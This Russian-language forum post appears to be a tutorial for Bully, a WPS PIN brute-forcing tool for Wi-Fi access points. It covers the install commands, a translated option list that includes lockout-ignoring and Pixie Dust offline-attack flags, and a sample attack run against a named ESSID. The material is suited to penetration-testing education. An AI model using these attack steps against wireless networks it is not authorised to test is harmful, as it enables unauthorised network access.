• Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Bully — расширенный аналог Reaver

BKeaton

Green Team
18.07.2018
204
337
BIT
105
Bully — это новое воплощение WPS атаки методом перебора паролей, расширенный и дополненный аналог Reaver. Программа написана на языке C и концептуально идентична другим программам в использовании ошибок проектирования спецификации WPS. По сравнению с оригинальным кодом аналогичных программ, данная программа имеет несколько преимуществ, таких как:

зависимостей;
улучшение памяти и времени работы центрального процессора;
правильная обработка порядка следования байтов и более функциональный набор опций.​

Программа работает на Linux, и была специально создана для использования на встроенных системах Linux (OpenWrt, и т.д.) без привязки к архитектуре. Bully обеспечивает ряд усовершенствований в обнаружении и обработке аномальных сценариев. Она была успешно протестирована на точках доступа многих производителей, а также с различными конфигурациями.

У вас должна быть уже установлена программа Wiire’s Pixiewps.Последнюю версию можно найти здесь.
Технические требования
apt-get -y
вызовет установку дополнительных пакетов и библиотек build-essential libpcap-dev libssl-dev aircrack-ng pixiewps

Установка Bully
Скачайте
git clone https://github.com/aanarchyy/bully

или

wget https://github.com/aanarchyy/bully/archive/master.zip && unzip master.zip
Настройте
cd bully*/ cd src/ make
Установите
sudo make install
Использование bully
root@kali:~# bully -h bully <options> интерфейс
Необходимые параметры:
Интерфейс : Беспроводной интерфейс в режиме монитора (требуется root)
-b, --bssid macaddr : MAC адрес целевой точки доступа
Or
-e, --essid string : Расширенный SSID для точки доступа

Дополнительные параметры:

-c, --channel N[,N...] : Номер канала AP, или список единиц измерения [b/g] -i, --index N : Начальный индекс пина (7 или 8 символов) [Auto] -l, --lockwait N : Секунд для ожидания если AP заблокирован WPS [43] -o, --outfile file : Файл для вывода сообщений [stdout] -p, --pin N : Начальный номер пина (7 или 8 символов) [Auto] -s, --source macaddr : Исходный (железный) MAC адрес [Probe] -v, --verbosity N : Уровень вербальности 1-4, 1 – самый тихий [3] -w, --workdir path : Расположение файлов пина/сессии [~/.bully/] -5, --5ghz : Список каналов по умолчанию для прыжков 5GHz a/n [No] -B, --bruteforce : Контрольная сумма пинов WPS для подбора пароля [No] -F, --force : Принудительно продолжать несмотря на предупреждения [No] -S, --sequential : Последовательные пины (не рандомизировать) [No] -T, --test : Режим тестирования (не вводить какие-либо пакеты) [No]

Продвинутые параметры:

-d, --pixiewps : Попытка использования pixiewps [No] -a, --acktime N : Устаревшая/игнорируемая [Auto] -r, --retries N : Повторная отправка пакетов N раз, когда нет подтверждения [2] -m, --m13time N : Устаревшая/игнорируемая [Auto] -t, --timeout N : Устаревшая/игнорируемая [Auto] -1, --pin1delay M,N : Задержка M секунд каждое N не подтверждение в M5 [0,1] -2, --pin2delay M,N : Задержка M секунд каждое N не подтверждение в M7 [5,1] -A, --noacks : Отключить проверку ACK для отправляемых пакетов [No] -C, --nocheck : Пропустить валидацию CRC/FCS (производительность) [No] -D, --detectlock : Выявить WPS блокировки, о которых не сообщает AP [No] -E, --eapfail : EAP Failure после каждой отправки [No] -L, --lockignore : Игнорировать WPS блокировки, о которых сообщает AP [No] -M, --m57nack : M5/M7 тайм аут рассматриваемый как WSC_NACK's [No] -N, --nofcs : Пакеты не содержат поле FCS [Auto] -P, --probe : Использовать запросы зондирования для AP [No] -R, --radiotap : Предположительно, что заголовки radio tap присутствуют [Auto] -W, --windows7 : Делать вид, что регистрируется Windows 7 [No] -Z, --suppress : Подавлять алгоритм тротинга пакетов [No] -V, --version : Напечатать версию и выйти -h, --help : Напечатать эту справку

-d // —pixiewps
Опция -d выполняет автономную атаку, Pixie Dust (pixiewps), автоматически передавая PKE, PKR, E-Hash1, E-Hash2, E-Nonce и Authkey, pixiewps будет пытаться атаковать Ralink, Broadcom и Realtek чипсеты.

-v // — verbosity
Опция –v определяет вербальность bully. – v 4 печатает все собранные хэши и выводит команду запустить pixiewps. По умолчанию уровень запуска 3.

Пример использования Bully
Атака беспроводной сети ESSID (-е 6F36E6) с использованием интерфейса режима монитора (mon0) :

root@kali:~# bully -e 6F36E6 mon0 [!] Bully v1.0-22 - оценка уязвимости WPS [X] Неизвестная частота '-113135872' сообщает интерфейсу 'mon0' [!] Использование '00:1f:33:f3:51:13' для источника MAC - адресов [+] Datalink тип установлен в '127 ', показывает заголовки [+] Опрашиваем '6F36E6' на канале 'неизвестно' [+] Получил ответ для '6F36E6' (9c:d3:6d:b8:ff:56) [+] Переключение интерфейса 'mon0' для канала '8' [!] Информационный элемент указывает, что WPS заблокирован [!] Создание нового рандомизированного pin - файла '/root/.bully/pins' [+] Индекс исходного pin '0000000' [+] Последний статус = 'NoAssoc' Следующий pin '54744431'
При подготовке материала использована информация aanarchyy/bully и
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!